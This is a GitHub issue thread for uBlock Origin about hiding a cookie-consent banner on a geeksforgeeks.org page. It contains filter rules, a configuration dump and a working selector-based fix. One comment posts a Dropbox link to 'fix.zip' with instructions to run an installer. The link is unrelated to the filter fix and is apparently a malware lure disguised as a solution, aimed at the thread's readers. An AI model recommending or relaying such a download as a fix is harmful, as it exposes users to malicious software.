### ISSUE TITLE
geeksforgeeks.org: nuisance

### ISSUE THREAD

**Issue by Rudxain** [uBlockOrigin/uAssets#25046]
### Prerequisites

- [X] This is **NOT** a [_YouTube_](https://www.github.com/uBlockOrigin/uAssets/issues/20586), [_Facebook_](https://www.github.com/uBlockOrigin/uAssets/issues/3367), [_Twitch_](https://www.github.com/uBlockOrigin/uAssets/issues/5184) or [_a shortener/hosting site_](https://github.com/uBlockOrigin/uAssets/discussions/17361) report. _These sites MUST be reported by clicking their **respective links**_.
- [X] I read and understand the [policy about what is a valid filter issue](https://github.com/uBlockOrigin/uAssets/blob/master/README.md#uassets).
- [X] I verified that this issue is not a duplicate. (Use this [button](https://user-images.githubusercontent.com/585534/146582579-c32707a0-36a1-4cc5-ad50-83172c9f67a8.png) to find out.)
- [X] I did not remove any of the [default filter lists](https://github.com/uBlockOrigin/uAssets/assets/66517106/6e8d024a-5869-47cf-b142-b2357eb6c7d0), or I have verified that the issue was not caused by removing any of the default lists.
- [X] I did not enable additional filter lists, or I have verified that the issue still occurs without enabling additional filter lists.
- [X] I do not have custom filters/rules, or I have verified that the issue still occurs without custom filters/rules.
- [X] I am not using uBlock Origin along with other content blockers.
- [X] I have verified that the web browser's built-in content blocker/tracking protection, [network wide/DNS blocking](https://en.wikipedia.org/wiki/DNS_blocking), or my VPN is not causing the issue.
- [X] I have verified that other extensions are not causing the issue.
- [X] If this is about a breakage or detection, I have verified that it is caused by uBlock Origin and isn't a site issue.
- [ ] I did not answer truthfully to **ALL** the above checkboxes.

### URL address of the web page

`https://www.geeksforgeeks.org/problems/frequency-of-array-elements-1587115620/0`

### Category

nuisance

### Description

There's a cookie-notice at the bottom of the viewport. It can be removed with:
```abp
##.cookieConsent_gfg_cookie__container___EQKa
```

### Other extensions used

_none_

### Screenshot(s)

<details>
<summary>Screenshot(s)</summary>

![image](https://github.com/user-attachments/assets/8285ee8d-302a-42a7-8672-0efd14407f72)

</details>

### Configuration

<details>

```yaml
uBlock Origin: 1.57.0
Firefox: 115
filterset (summary):
 network: 249626
 cosmetic: 260878
 scriptlet: 54139
 html: 2179
listset (total-discarded, last-updated):
 added:
  adguard-generic: 84462-4142, now
  adguard-mobile: 9650-60, now
  adguard-spyware-url: 1662-124, now
  adguard-spyware: 79780-1549, now
  block-lan: 71-0, now
  curben-phishing: 537-1, 47m
  adguard-cookies: 31142-56, now
  ublock-cookies-adguard: 1670-27, now
  fanboy-cookiemonster: 51736-3968, now
  ublock-cookies-easylist: 1670-1670, now
  adguard-social: 23343-58, now
  fanboy-social: 16971-753, now
  [12 lists not shown]: [too many]
 default:
  user-filters: 0-0, never
  ublock-filters: 39721-126, now
  ublock-badware: 10670-6, 47m Δ
  ublock-privacy: 1064-4, 47m Δ
  ublock-unbreak: 2556-1, 47m Δ
  ublock-quick-fixes: 180-9, 47m Δ
  easylist: 85538-2578, now
  easyprivacy: 53073-26415, now
  urlhaus-1: 29165-0, 47m
filterset (user): [empty]
trustedset:
 removed:
  chrome-extension-scheme
switchRuleset:
 added: [array of 53 redacted]
hostRuleset:
 added: [array of 64 redacted]
 removed:
  behind-the-scene * * noop
  behind-the-scene * image noop
  behind-the-scene * 3p noop
  behind-the-scene * inline-script noop
  behind-the-scene * 1p-script noop
userSettings:
 advancedUserEnabled: true
hiddenSettings: [none]
supportStats:
 allReadyAfter: 579 ms (selfie)
 maxAssetCacheWait: 452 ms
 cacheBackend: indexedDB
popupPanel:
 blocked: 31
 no-popups: true
 network:
  clarity.ms: 1
  d3tojzvpbuo41f.cloudfront.net: 6
  facebook.net: 2
  google.com: 1
  googletagmanager.com: 3
  gstatic.com: 15
  typekit.net: 3
 extended:
  ##.cookieConsent_gfg_cookie__container___EQKa
  ##+js(no-setTimeout-if, .login-modal-btn:eq(0))
  ##+js(no-setTimeout-if, onscroll, 5500)
  ##+js(no-setTimeout-if, login, 5000)
  ##+js(abort-current-script, showAdblockerModal)
```
</details>

**Comment by Rudxain** [comment]
I tried enabling all "Cookie notices" filters, but the nuisance persists

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by mapx-** [comment]
`geeksforgeeks.org##[class^="cookieConsent_gfg_cookie__container"]`

**Comment by Rudxain** [comment]
> `geeksforgeeks.org##[class^="cookieConsent_gfg_cookie__container"]`

Tested on Firefox for Android. It works! Haven't tested on the same desktop/laptop as the original issue yet

**Comment by krystian3w** [comment]
https://github.com/easylist/easylist/commit/a4ec401b29c11f60e8fbcd27d1283719603aad83
